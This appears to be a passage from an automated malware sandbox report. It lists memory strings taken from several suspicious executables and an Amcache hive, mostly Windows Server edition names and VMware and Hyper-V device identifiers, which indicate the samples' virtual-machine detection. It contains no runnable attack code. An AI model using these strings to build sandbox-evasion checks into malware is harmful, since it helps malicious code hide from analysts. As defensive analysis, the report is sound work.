Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MPGPH131.exe, 00000008.00000002.4459782824.0000000001691000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000t
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000B52000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000a
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!!fW
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000B52000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000003.2022624316.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh-(
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000B52000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, 00000007.00000003.2101195637.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}@8
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}MAIG9
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Hyper-V
Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: MPGPH131.exe, 00000008.00000002.4459782824.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Pc=
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000003.2022506492.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369419269.0000000000C65000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: MPGPH131.exe, 00000007.00000002.4459125656.000000000129C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}j
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}tcachlX
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: jHYZko.exe, 00000001.00000002.2306997313.000000000125E000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000003.2022624316.0000000001277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnZW
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: MPGPH131.exe, 00000008.00000002.4459782824.0000000001667000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}P
